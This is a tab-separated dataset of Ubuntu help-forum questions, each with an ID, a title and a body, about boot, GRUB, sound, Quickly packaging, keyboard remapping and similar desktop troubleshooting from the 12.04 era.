156415	xorg issues ubuntu 12.04 - freezing	i 'm getting random freezing issues on my pc running 12.04 ( core i5 3450 w/ integrated graphics ) and have n't been able to pinpoint the exact cause of the problem . however i have been getting `` sorry , ubuntu 12.04 has experienced an internal error '' messages regarding `` xorg '' . here 's a screenshot of the error window : http : //i.imgur.com/5nh5b.png this is on a clean install of ubuntu as well . one thing i noticed is these issues start happening the moment i connect my pc to the internet and attempt to install updates which always results in an error . here 's a screenshot of the update manager error : http : //i.imgur.com/2fgk4.png any ideas on what could be causing this issue ? thanks for any help .
156418	no 3d support with dual video cards	i have a standard intel graphics card and one ati radeon hd 6490m . there is no support of 3d effects with my dual video cards ? what could be the problem ? my computer is a hp probook 4530s with ubuntu 12.04 64-bit .
156428	`` corrupted filesystem tarfile - corrupted package archive '' while processing a deb package	i keep getting the following message : check if you are using third-party repositories . if so , disable them , because they are a common source of problems . furthermore , run the following command in a terminal : apt-get install -f i have no idea how to disable third-party repositories , or even that i had them . i also encounter the same problem every time i try sudo apt-get install -f : dpkg : error processing /var/cache/apt/archives/libflite1_1.4-release-2_i386.deb ( -- unpack ) : corrupted filesystem tarfile - corrupted package archive dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libflite1_1.4-release-2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
156430	boot stuck at violet postgrub	new ubuntu 12.10+gnome-shell fails on boot on my asus-board , amd proc and radeon hd57xx graphix , installed on a ocz ssd . it 's stuck at boot directly after the grub menu . i tried to boot recovery mode , but had no success , but after a huge amount of time the num-led is not controllable anymore . when i cut the power and try to boot then , it works until restart . is there a way to fix this ? < 3 u for answers !
156435	adobe reader problem in running : internal error	i just have installed adobe reader using apt-get install acroread . but it does not run , and shows this message : an internal error occured
156446	dual boot - 12.04 installed first	i have found many guides with how to install windows and ubuntu in dual boot mode , but none from the perspective of a ubuntu user . unfortunately wine or openoffice do not display a document that i am working on properly so i am forced to getting windows back temporarily . can anyone give me some guidance on how to go about this , sorry but step by step instructions are needed as i am still fairly new to linux
156449	how do i install the ray-tracing application pov-ray on 12.04 ?	i 'm surprised ( and disappointed ) to see that the classic ray-tracing program povray has been dropped from the repositories on 12.04 . what is the best way to install it ? it does n't appear that anyone has prepared a ppa for precise .
156455	remember gnome-terminal position across multiple desktop after reboot	i work with several virtual desktop ( gnome desktop ) and several terminal with several tab in each terminal . how to remember the position , size , current directories of all this when reboot ?
156459	how do i move a folder to /usr/lib ?	when i try to move it via winscp , it says : general failure ( server should provide error description ) . error code : 4 error message from server : failure request code : 18 i 'm trying to install java . @ compt i need to install java 7 for my minecraft server and when i searched on google for java 7 , a tutorial for doing this came up .
156461	cron not sending email notifications	i 'm finishing biulding our new server , based on 12.04 32-bit desktop version . i 've set up a few cron tasks , that are running as they 're supposed . only , i 've added the mailto = `` my_adress @ ssss.gouv.qc.ca '' environnement variable to be notified when tasks are running , and nothing seems to pass through . according to logs , ( and the created files ) my cron tasks are running , but no mail is being sent ; both /var/log/mail.log and /var/log/mail.err are empty . is there a mail-server automatically installed with ubuntu ? is it what 's used by the cron process to send its notifications ? thanks !
156467	quickly glade button link to external program	this is my first post so forgive me for any errors . i am using quickly to create a program . the problem i am having , is when i create the button , i am unable to set the command i wish to launch on the click activation . i have looked around for tips on using the subprocess module , but i could not find anything helpful . any help would be greatly appreciated .
156469	ubuntu quickly with different revision control	how can i configure quickly save to use a different revision control system like git or hg ? ? i really do not like bzr , and most probably will never use ppas because i mostly do private research projects .
156474	grub error 17 and 18 - grub rescue - how to boot again ?	i 've read several similar grub error questions and answers , researched on google ( a lot ) , but still have not found a solution to my problem . i have an `` old '' notebook where i 've installed windows xp and then ubuntu 8.04 - everything worked well for a long time . after the kids played with it ( i.e . i have not seen what happened ) , i could n't boot anymore . grub simply said error 17 , and nothing else . after several error 17 failures , the error changed to error 18 - and this is the error it shows now . what have i tried ? i tried several linux live cd 's and dvd 's i have : ubuntu 8.04 , kubuntu 10.04 , ubuntu 10.04 , ubuntu 11.10 , fedora 11 , etc . - none of them is able to start , in all modes and options i tried ( i have not manually edited the commands , but tried the provided options ) . i ca n't use the live cd os , and i ca n't install them either . this is important : it is ok to erase all hd contents ! it is ok to format , repartition , lose all hd data - no problem . in most of the ubuntu flavours , including the 8.04 cd , the initialization stucks , showing repeatedly the following error messages : ata3.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata3.00 : bmdma stat 0x25 ata3.00 : cmd 25/00:08 : e5 : a5:50/00:00:12:00:00/e0 tag 0 dma 1024 in ata3.00 : status : { drdy err } ata3.00 : error : { unc } i also have tried the windows xp installation cd . the recover command-line fails : fixmbr , fixboot , format - nothing works . if i try diskpart the partitioning tool tells me the hd is `` unreachable '' and if i try to continue a kind-of bsod appears , giving me the only option to restart the computer . if instead of the recover command-line , i try to install the system , the same diskpart thing happens in the partition selection step . so , i downloaded and burned rescatux into a cd . it ca n't start , saying : welcome to grub ! error : invalid arch independent elf magic . entering rescue mode ... grub rescue > and i am left with this grub rescue prompt , which sounds good , but it is useless to me , since i have no idea of what and how can i do with it . so , please , good and helpful souls who read my quest up to here : what can i type in this grub rescue prompt which can help me in the way of being able to boot again ? ? ? it is ok to me to format the hd , reinstall windows xp , reinstall ubuntu , repartition the hd , or eventually restore the damaged part and recover the dual boot ability . i just want to use my notebook again . thanks !
156475	why ca n't i get sound through hdmi with nvidia gtx580	i 've just installed the newest version of alsa and my nvidia device showed up in the gnome-volume-control . i ca n't actually get any sound on the tv though . when searching around it seems the solution for 95 % of people is to `` unmute the device '' . my device is not muted or disabled : my tv is not muted and it gets sound perfectly from my xbox . also , switching to `` internal audio analog stereo '' or `` logitech g930 headset analog stereo '' works and gives me sound . additionally when booting to windows the hdmi audio works fine . i do n't know what to make of the alsamixer though : why ca n't i get any sound on my tv through nvidia gtx580 ? here 's my alsainfo output : http : //www.alsa-project.org/db/ ? f=e41666ca9765badc84098ee4bc18c2c38f4bd856
156483	automatically run terminal with certain command on login	mother dropped some tea in the keyboard and as a result of that the shift key died.i mean it is always on . i researched and found out that there is a comand to solve that : xmodmap -e 'keycode 50 = nosymbol' so i open terminal and copy paste . works perfect . the only problem is that on startup the order is gone and it is trcky to `` teach her '' how to do it again.so i like to fix it forever without having to go to the terminal everytime i start the computer ... it has been 2 weeks without restarting ... : - ) i read a couple of post about `` expect `` command but could not figure it out .
156484	how do i install python imaging library ( pil ) ?	how do i install the python imaging library ( pil ) on ubuntu ? i tried doing sudo apt-get install python-imaging but now when i run python selftest.py ( a script i got from somewhere on the http : //pythonware.com/products/pil/ website ) i get ( among other warning messages ) : ... *** jpeg support not installed *** zlib ( png/zip ) support not installed ... *** 1 tests of 57 failed . have i somehow messed up the pil -- how do i fix that ? is maybe the pil just fine , but that `` selftest.py '' is not really the right program for checking to see if pil is installed properly -- how else can i tell if pil is installed properly or not ? ( i 'm using ubuntu 12.04 lts `` precise pangolin '' ) . ( what i 'm ultimately trying to do is to add a 2d barcode generator to some python code , and all the 2d barcode generators i could find that were written in python all seemed to use the pil ) .
156488	maximize and minimize buttons disabled on my quickly application	i was editing some basic settings in my application window design in quickly/ gtk when i noticed that when i ran my app there was only a close button , not a maximize or minimize button . i know this is probably a silly question , but i can not find the setting to enable them any where . please help ! : )
156490	how do i change address books in gnome-contacts ?	how do i reset the settings of gnome-contacts ? i want to switch from the local address book to use the gmail address book . when gnome-contacts is launched for the first time it offers us two choices , but once the choice is made , is not possible to reconfigure it . i looked in /home for the settings , but i found nothing .
156497	what does error : `` prefix '' is not set and error : `` prefix '' not found means ?	before i disabled the acpi ( because it is not supported by ubuntu ) ubuntu ca n't boot ( obviously ! ) at that time when i boot ubuntu , i always get these 2 messages . after 1 of those message shows , nothing shows up . error : `` prefix '' is not set error : `` prefix '' not found although my problem is solved , i just want to know what these 2 messages mean in general , like what makes grub show this message . espically the `` prefix '' part .
156498	create global template directory	i want to move template directory out from my ~ home folder . i would like to have one global template directory . one option , that i think can be possible is to create a link ( shortcut or how is it called in linux ) to template , but then template file would still be in my folder and i do n't know where to put global template folder , where is a place , that should be used by it ( maybe /opt ? ) . so basically : is it possible to create one global template folder instead of template for every user ? and how ? ( by one , i mean , that i 'm able to remove template folder from every user ) . if not : where should i put a folder with templates , where is a good place for putting my global configurations in linux ? edit : i checked and put my global templates folder in /opt/template , then i made a link from every user account to that place and it works fine , but still i have no idea , if it is possible to get rid of template folder ( or link ) completely in user 's home folders .
156499	is it safe have more than one version of java ?	this question popped up when i tried to download a game for dolphin emu . the site isohunt recommended i use vuze and vuze requires jre . silly me , as a windows noob , i immediately thought i d have to have the latest update . well i got openjdk 7 and then i realized and i had openjdk 6 and 7 . so i deleted the openjdk6 stuff and now vuze/azureus says i need openjdk 6 . so any advice about any of this would be very helpful . thanks in advance .
156500	can i install sap solution manager in ubuntu server ?	i 'm going to install sap solution manager -- can i do this in ubuntu server ?
156502	how do i batch rename a specific file inside multiple zip archives via the command line ?	i have about 200+ shareware files in zip format that each contain a file called `` file_id.diz '' . i need to know how to rename each instance to lowercase `` file_id.diz '' without doing it manually - i 've already gone that route and it 's pretty time consuming . that file has to be lowercase because the bbs program i 'm using ignores the file_id.diz as a description since it is uppercase . if i manually change it to lowercase , the description is imported successfully . i know that rar has a renaming switch , but then i 'd have to batch convert all of the zip files to rar , and then back to zip . i 'm not ruling that out entirely , but it seems like the long way around to resolving this . i found the man page for `` zip_rename '' , which looks like it might do the trick , but i have no idea how to actually implement it . i refuse to do this on a windows machine - i just ca n't and wo n't do it ... it 's the principle ; ) . anyway , thanks for your time !
156504	quickly share error ( ca n't upload to ppa )	i 'm using quickly and i ca n't seem to upload to my ppa . this is what i get : $ quickly share -- ppa swink/ppa get launchpad settings launchpad connection is ok ... ... ... an error has occurred when creating debian packaging error : ca n't create or update ubuntu package error : share command failed aborting i can create a package but i do get a warning : $ quickly package -- extras ... ... ..ubuntu packaging created in debian/ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . command returned some warnings : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ** ( setup.py:26291 ) : warning ** : error sending credentials : error sending message : operation not permitted -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ubuntu package has been successfully created in ../unity-bookmarks_1.0-public4_all.deb what could be the issue ? edit : when i run debuild -s , i get this : clearsign failed : secret key not available edit 2 : i even tried to setup a fresh pgp key , but i get exactly the same errors ...
156509	valueerror when running quickly share	i have successfully created and packaged a quickly application , and i would like to upload it to my ppa . when i run quickly submitubuntu -- ppa ppa : techsavvy8989/test , i get the following error : get launchpad settings traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/share.py '' , line 101 , in < module > launchpad = launchpadaccess.initialize_lpi ( ) file `` /usr/lib/python2.7/dist-packages/quickly/launchpadaccess.py '' , line 91 , in initialize_lpi allow_access_levels= [ `` write_private '' ] ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 539 , in login_with credential_save_failed , version ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 359 , in _authorize_token_and_login service_root , cache , timeout , proxy_info , version ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 198 , in __init__ credentials , service_root , cache , timeout , proxy_info , version ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/resource.py '' , line 460 , in __init__ self._wadl = self._browser.get_wadl_application ( self._root_uri ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 299 , in get_wadl_application response , content = self._request ( url , media_type=wadl_type ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 242 , in _request str ( url ) , method=method , body=data , headers=headers ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 211 , in _request_and_retry url , method=method , body=body , headers=headers ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1346 , in request info , content = cached_value.split ( '\r\n\r\n ' , 1 ) valueerror : need more than 1 value to unpack error : share command failed aborting what did i do wrong ?
156516	why does the 12.04 i386 desktop install fail on an athlon xp 3000+ system ?	placed ubuntu i386/32bit 12.04 lts [ desktop ] disc in the disc tray . the disc loads fine . clicked install ubuntu . without checking the download updates while installing or install this third-party software . clicked continue . mouse cursor turns to spinning circle and remains a spinning circle while the screen freezes its place at `` preparing to install ubuntu '' . i tried not checking any of the boxes and clicking continue . i tried checking download updates while installing . i tried checking install this third-party software . i tried checking both download updates while installing and install this third-party software . does anyone else face this very same issue ? is there a workaround for this problem ? do i need to use a lower version of ubuntu ? if so , which version do you recommend for my system specifications ? my system meets the system requirements . here are my exact system specifications . ( custom modifications : 320gbx2 hdd & & 256mb agp gfx card & & 1gbx2 ram )
156517	grub rescue-error : unknown filesystem	i have installed ubuntu inside windows and then afterwords i installed fedora 16 ... all time during start up its show os selection by grub loader but after i did some partition on windows its shows error : unknown filesystem.enterting rescue mode.. grub rescue > grub rescue > ls ( hd0 ) ( hd0 , msdos9 ) ( hd0 , msdos8 ) ( hd0 , msdos7 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) and then i found out content of partition root as u told.. grub rescue > ls ( hd0 , msdos7 ) / ./ ../ lost+found/ etc/ dev/ boot/ var/ sys/ proc/ lib64/ usr/ bin/ home/ lib/ media/ mnt/ opt/ root / run/ sbin/srv/ tmp/ .readahesd grub rescue > ls ( hd0 , msdos7 ) /boot/grub ./ ../ splash.xmp.gz grub rescue > set prefix= ( hd0 , msdos7 ) /boot/grub and then if i give all load module command it says error : file not found . what i can do now any body help this hoping for correct solution
156518	nautilus uses different permissions for mounted drives	i 've written two bash scripts to give read-only or read/write access to my ntfs partition : read-only access : sudo umount /media/data_drive/ sudo mount -t ntfs-3g -o ro , user , auto , nls=utf8 , umask=0000 , uid=1000 /dev/sda2 /media/data_drive read/write access : sudo umount /media/data_drive/ sudo mount -t ntfs-3g -o rw , user , auto , nls=utf8 , umask=0000 , uid=1000 /dev/sda2 /media/data_drive it works perfectly if i only use terminal to work with the files . it also works with nautilus in read-only mode but not in the read/write mode . in fact , nautilus gives me an error when i try to copy a file to data_drive saying `` the destination is read-only '' . more funny , when i look at the permissions ( by right-clicking on data_drive and then properties- > permissions ) i have all the required permissions to write a file in data_drive ! i am so confused why nautilus behaves strangely . i appreciate if anybody could solve the mystery !
156521	how to set notify-osd as default in gnome classic session ?	using ubuntu 12.04 in gnome classic session , the notify-osd is replaced by this one in image below : how to set notify-osd as default again ?
156526	how to bind two keys , like control+z= '' < `` with xev and xmodmap	im trying to find how to something like : control+z= '' < `` control+x= '' > '' is this possible ? my keyboard doesnt have the iso missing key that in portuguese matches the < > key . the keycode for < > key is 94 , being that without shift is < ( less ) and with shift pressed is > ( greater ) the keycode for control left is 37 , control_l the keycode for z is 52 and for x is 53 . how can i do this using xmodmap : xmodmap -e `` keycode 37 + keycode 52 = less '' xmodmap -e `` keycode 37 + keycode 53 = greater ''
156529	how do you end pigdin when it 's hung ?	so i have pidgin messenger and after i installed it and configured it , it has n't initialized properly . i can see to the left on my launcher that its supposedly on because it is marked but i ca n't interact with it and i see no window .
156531	digital audio output light on on macbook pro	i do n't know if this problem happened when i installed ubuntu before . recently i noticed that when i boot ubuntu , the digital audio output light automatically switches on . digital audio output light on means `` something wrong in the headphone port '' . although my headphone is working in ubuntu . i 've heard that the headphone contains some magical `` switch '' that will fix the light problem . so i poked the headphone port with chopsticks , pens , paper clips , even my finger , and the digital audio output light still stays on . i do n't have this problem in osx . how do i switch the light off ?
156535	installation hangs at `` retrieving file 43 of 105 ''	this is my second attempt at installing ubuntu . in my first attempt , i selected `` download updates '' and `` install third-party components '' ; in my second attempt , i deselected both . still experiencing the same problem . in my first attempt at installing ubuntu , after the installation stuck at `` retrieving file 43 of 105 '' , i selected `` skip '' and the installation completed . after i started to run the os , i received a notification that language support was incomplete . when i tried to update it , the ubuntu software centre updating process hung on `` waiting for jockey-backend to exit '' , seemingly indefinitely . at that point , i decided to reinstall the system ( since the whole process is only supposed to take 45 minutes or less ) , but , as i mentioned above my results were the same . i 'm new to ubuntu . any advice ? where are the files ( including file 43 ) being retrieved from ? online or from the ubuntu installation iso ? i have searched many forums for an answer to this problem , and have seen others with the same issue but i have n't found a solution .
156536	grub is not presenting kernel 3.2 as an option	i 'm running ubuntu 12.04 . this morning after a long-overdue reboot for a long-pending kernel update , i discovered that i could no longer start up any virtualbox machines ; long story short , this lead me to discover that i am currently running kernel 3.0 : root @ vmsys : ~ # uname -r 3.0.0-19-generic this is odd , considering that i understand 12.04 runs on kernel 3.2 , and i have a 3.2 kernel installed : root @ vmsys : ~ # ls /boot/vmlinuz-3.2* /boot/vmlinuz-3.2.0-24-generic /boot/vmlinuz-3.2.0-25-generic root @ vmsys : ~ # aptitude search linux-image-3.2.0-25-generic i linux-image-3.2.0-25-generic - linux kernel image for version 3.2.0 on 64 bit x86 smp p linux-image-3.2.0-25-generic : i386 - linux kernel image for version 3.2.0 on 32 bit x86 smp p linux-image-3.2.0-25-generic-pae : i386 - linux kernel image for version 3.2.0 on 32 bit x86 smp now , i did have an issue not too long ago that i only resolved after tinkering in grub 's menu selections and poking around in all kinds of places i 'm not very familiar with , so i may very well have caused whatever the issue is . this system is also an upgrade , although i no longer recall what the original version i was running ; perhaps its age is to blame . the long and the short , though , is that i need to have my virtualbox kernel modules in order to run my virtualbox machines , however the repositories install them for kernel 3.2 -- not 3.0 ! i certainly could install the kernel 3.0 modules myself -- that 's not beyond my capabilities -- but that seems like dodging the real issue , which is that ubuntu and/or grub are somehow mis-configured to boot an outdated kernel . so the question really is : how do i get the 3.2 kernel into grub 's menu selection ( and ideally as the default selection ) without messing things up any further ( i.e . so that i do n't find myself right back here again with the next kernel update ) ? i did try apt-get install linux-image-generic -- reinstall , to no avail -- grub still does n't show any 3.2 kernel options , and boot into this 3.0 kernel by default . it seems really strange that a kernel update , which has always updated grub 's menu in the past , would leave itself entirely off the menu ... edit : i did n't pay much attention to the tag , but checking further i just discovered that i have the package grub installed , but there 's a grub2 package available which is not installed . should i be on grub2 , or is that not the problem ?
156537	after reinstalling and restoring my /home files , i ca n't use the volume indicator	some context : i just upgraded from ubuntu 11.10 to 12.04 , or rather reinstalled it , because i formatted the partitions and i made a separated one for /home . i backed up /home , and after installing precise , i copied the /home backup to its partition . now then . i 've got sound and i can regulate the volume by typing 'alsamixer ' in terminal , but , since my volume indicator did n't work , even after installing pulseaudio volume control , which said connection to pulseaudio failed . automatic retry in 5s . ; sound in system settings did n't show any hardware , and i do n't have privative drivers to install , i took the risk of doing 'aptitude purge pulseaudio ' - 'aptitude install pulseaudio ' . now i do n't even have the useless volume indicator , and to adjust the volume i 've got to keep typing 'alsamixer ' . when i type 'pulseaudio ' in terminal , it gives me e : [ pulseaudio ] core-util.c : home directory /home/usuario not ours . i commented about the /home backup because i also thought it could have been a settings file i should n't back up , but i do n't know . 多any ideas ?
156538	why does gtkcalendar counts months from 0 ?	so i spent several hours in rage , figuring out why is n't my code writing to the /sys/class/rtc/rtc0/wakealarm correctly . the problem is that it does n't return anything if the value is wrong . and finally i noticed this small 5 between the year and the day . why is n't it counting days and years from zero for consistency ? for comparison : qcalendarwidget counts month from 1 to 12 ( docs )
156541	how can i disable all gnome shell notifications ?	i recently switched to gnome shell . everything works great expect that i keep getting notifications of wired disconnects and one about mail . is there anyway to disable all notifications in gnome shell ?
156543	i ca n't play games with ubuntu 12.04	i erased the entire disk to install ubuntu 12.04 on my acer aspire 5750g . i tried heros of newerth , teeworlds , and super tux 2 . none of these games can be initialized . can anyone help me ? i can provide more details if you need them .
156548	run ubuntu applications from windows	i am wondering if there is a way to run ubuntu applications from windows . i have heard of wine , which emulates windows in order to run windows applications on ubuntu . is their a windows application that would allow you to run ubuntu applications on windows ?
156553	fresh install of ubuntu 12.04 via wubi , no sound . any help ?	as the title says , i just installed ubuntu 12.04 on my laptop using wubi , and i have no sound . $ pavucontrol shows sound playing , but nothing is coming out through speakers or headphones . you can access my sound information there . sound has worked previously with kubuntu install on the same machine , and works fine in windows 7 . please help !
156554	remember window monitor for windows in multi-monitor setup ( 12.04 )	i 'm on unity 3d , in a dual-monitor setup . i like to keep certain applications on fixed monitors / workspaces . however , it annoys me needing to move all those windows to the desired monitor / workspace every day . is it possible to remember the monitor and workspace for specific windows in unity 3d ? i know kde 's kwin can do it ...
156560	how do i uninstall wubi ?	how can i uninstall ubuntu which i installed using wubi without affecting my files if i have 2 os 's on 1 partition ?
156564	how do i connect to my running vm via virsh ?	my vm has already been started via virsh start chameleon.ootbdev . when i do a virsh console chameleon.ootbdev i get the following output : connected to domain chameleon.ootbdev escape character is ^ ] error : internal error can not find character device ( null ) doing a google search on this led me to this `` solution '' . unfortunately , editing the domain via virsh edit chameleon.ootbdev does n't seem to stick . i suspect the issue is that i 'm inserting the xml incorrectly : the instructions from the link ask me to insert the following xml into the domain xml file . < serial type='pty ' > < target port='0'/ > < /serial > < console type='pty ' > < target type='serial ' port='0'/ > < /console > i 've posted my domain xml file to pastebin here . this is after i 've tried to insert the above xml . i inserted this xml after the < /devices > block . my primary question is : how do i connect to the running vm ? a secondary question would be : how do i edit the domain file with the above xml and get the changes to stick ?
156569	linux mint 11 : how to force 'which ' results to be updated ?	with command which we can get the pathname which would be executed in the current environment . but when i redefined a command with alias in .bashrc . the result returned by which is still the old one even in a new terminal . how can i get the right output ? $ which -a python /home/gerry/epd7/bin/python /usr/bin/python $ which python /home/gerry/epd7/bin/python $ python python 2.7.1+ ( r271:86832 , apr 11 2011 , 18:13:53 ) [ gcc 4.5.2 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > $ /home/gerry/epd7/bin/python enthought python distribution -- www.enthought.com version : 7.1-2 ( 64-bit ) python 2.7.2 |epd 7.1-2 ( 64-bit ) | ( default , jul 3 2011 , 15:17:51 ) [ gcc 4.1.2 20080704 ( red hat 4.1.2-44 ) ] on linux2 type `` packages '' , `` demo '' or `` enthought '' for more information . > > > update : i have tried source .bashrc , relogin , rebooting . none of them work . there must be cache somewhere . i am using mint linux 11 64bit
156572	my transcend external hdd ( 500gb ) works on ubuntu but not on windows	i have transcend 500gb external hard disk . i recently switched from windows7 to ubuntu . before everything was working fine , but now as i have my project files on external hard disk , i used mountmanager to mount my hdd on ubuntu . but now my hdd is only detected on ubuntu on my laptop ( not sure if will be detected on other laptop/computer with ubuntu ) . when i try to use it with windows , nothing happens at all , not detected , not even in disk management of windows , not a single sign of my hdd . but when i tried windows7 setup disk , i found my hdd in advanced tools . i have very valuable and confidential data in my hdd so do n't wana format it , any good idea to make my hdd fine on any device ? ? ? ? output of `` sudo fdisk -l '' disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000983fd device boot start end blocks id system /dev/sda1 * 1 38531 309492736 83 linux /dev/sda2 38531 38914 3076097 5 extended /dev/sda5 38531 38914 3076096 82 linux swap / solaris disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00058e44 device boot start end blocks id system /dev/sdb1 1 60801 488384001 7 hpfs/ntfs /dev/sdb1 is my external hdd btw , window setup can detect my hdd not in normal view ( default display of hdd available ) , it only detects only when i use advanced options ...
156580	function keys are not working on toshiba satellite l510 so brightness control is not possible	i am using toshiba l510 and ubuntu 12.04 . i can not control brightness of my system using function keys . what could be the cause ?
156593	ca n't retrieve files from trash even though i did n't empty it , open permission is denied	i am using ubuntu 10.04 lts - the lucid lynx - released in april 2010 . for some reasons i could n't see any files in the trash folder when i open it up by right clicked the icon . it shows it has 48 items when the mouse stays on the icon , but at the bottom of the open folder says `` 0 '' item . i sure did n't empty the folder as i had just accidentally remove 30 some pages edited files to the trash . while try to copy all the 48 items to another folder , an error message reads that permission to open file ( s ) is denied . i do n't see trash folder in home directory either . btw , i like to use linux , but i do n't know much about computer or program , so please use `` computer language for dummies '' ,
156598	changing launchpad username , and how to know what sites will be affected ?	i am setting up my developer profile on launchpad , and would like to change my username so it would be same as other sites i use , as well as better reflect me as a person . ( that 's a much more important thing than it sounds ) i want to do this now while i can , because as i understand it , once i set up a ppa it will be impossible to change it due to the username being locked into the ppa url 's to prevent breakages and other problems . but when trying to change my username , it warned me with this message . changing your name will change your public openid identifier . this means that you might be locked out of certain sites where you used it , or that somebody could create a new profile with the same name and log in as you on these third-party sites . how can i find out which sites will be locked out , and how to still change the username while preventing problems with other sites ? sorry if this is actually a question for launchpad itself . but i do n't know where to post questions like this on the launchpad site . edit : i understand that it is an issue with openid . but how am i to know what sites will be affected ? and how do i fix the problems this will cause ? ca n't i just reset the password ( and as a side affect , re-establish the connection with the new username ) using my email address ?
156600	terminal tty ctrl-alt-f # not working , only prints junk characters	i 'm not sure what i pressed to mess this up . i was on tty1 , but it does n't look like i 'm on tty1 anymore . when i press any key on the terminal it just prints weird letters . pressing ctrl-alt-f1 through f7 also just prints characters . multiple times i tried typing in reset and [ enter ] into the terminal , but it is n't fixing the problem . i tried typing ctrl-q then reset , but still just crazy characters . i 'm pretty sure the kernel is still running correctly because , before this happened , i started a very large file transfer from a host computer to this computer . the files still appear to be copying correctly from the host computer . http : //i96.photobucket.com/albums/l169/extralifestar/bad_term.png anyway to restore a system like this ?
156606	how can i accurately select an area of screen to record when using recordmydesktop ?	when using recordmydesktop i want to select an area of the screen to record , not just a particular window or the whole screen . the application instructs you to click and drag to select the area you want to record in the preview window , however this preview is very small and i ca n't find any way to make it larger ( maximizing the window makes no difference ) is there a way to make the preview window larger so that i can make a more accurate selection of the area i want to record . i 'd prefer to use recordmydesktop rather than another screencaster as its the only one that seems to work faultlessly for me .
156609	pygtk : opening links in default web browser	is there a way to create a gtk.button ( `` http : //www.google.com '' ) , when clicked will open the system default web browser using the label as the url ? what i could do is ... import os button = gtk.button ( label= '' http : //www.google.com '' ) label = button.get_text ( ) os.system ( `` sensible-browser `` + label ) the above code does what i need it to do . is this the correct way about doing this ? or is there a gtk function i should be using instead ? ( disclaimer : i am usually more specific with my questions , i feel like this is really basic and may not even be possible and i have checked the docs . thank you ! )
156611	opening 2 top level windows ( quickly/pygtk )	is there a way using quickly to have an appliaction have two completly seperate windows ( not a window with a dialog ) and be able to open each of the windows from each other and maybe even also from the command line : eg , application_name -- window_title
156612	installation with minimalcd : `` could n't download package ''	i am trying to install ubuntu server to a virtualbox virtual machine using the 32bit minimalcd . during the step `` install the base system '' , i get several warnings from packages that can not be downloaded , like dmsetup , ntpdate , passwd and xbd-data . edit : the actual packages that can not be downloaded seem to differ from day to day . when i retried today the error popped up for entirely different packages , and the aformentioned packages downloaded fine . this happens consistently in both the standard and the expert installation . i also tried different archive mirrors ( us , gb and be ) . all the other packages download fine . the strange thing is that when i retry the same step after it failed , everything passes fine from the second run . is this a common problem ? is there any way to avoid this step failing ?
156615	how do i buy from the software center with a foreign currency ?	i wonder if there is a way to buy games in the ubuntu software center using the philippine peso .
156618	when i boot up my notebook pc from usb it shows me this : bootmgr is missing	when i boot up my notebook pc from usb it shows me this : bootmgr is missing what could this mean ? please answer me.. i want to have ubuntu ! thanks anyway..
156620	how to verify the ssl fingerprint by command line ? ( wget , curl , ... )	using a command line website downloader , such as wget , curl or any other one ... in a script ... i have the sha-1 and the sha-256 certficate fingerprint of a website . due to security concerns ( 1 ) ( 2 ) , i do n't want to use the public ssl certificate authority system . the fingerprint must be hard coded . can a wget like application check the ssl fingerprint ? wget does not have such a functionality . ( 3 ) using wget -- ca-certificate or curl -- cacert i would have to run my own local certificate authority , which i 'd like to prevent , because that adds a lot complexity . it 's also ultra difficult and no one did that ever before . ( 4 ) is n't there any tool , like download -- tlsv1 -- serial-number xx : yy : zz -- fingerprint xxyyzz https : //site.com ? the solution must of course not be vulnerable to toctou . ( 5 ) the mitm could let return a valid fingerprint for the openssl client request and tamper with the following wget request .
156622	how to disable one [ single ] key shortcuts in ubuntu 12.04	i do not like one key shortcuts . whenever i press this while writing , one key triggers unneeded software . thus , i have some problems : how can i close alt shortcuts ? ( pressing alt triggers to type your command ) how can i close superkey shortcuts ? how can i close ctrl shortcuts ?
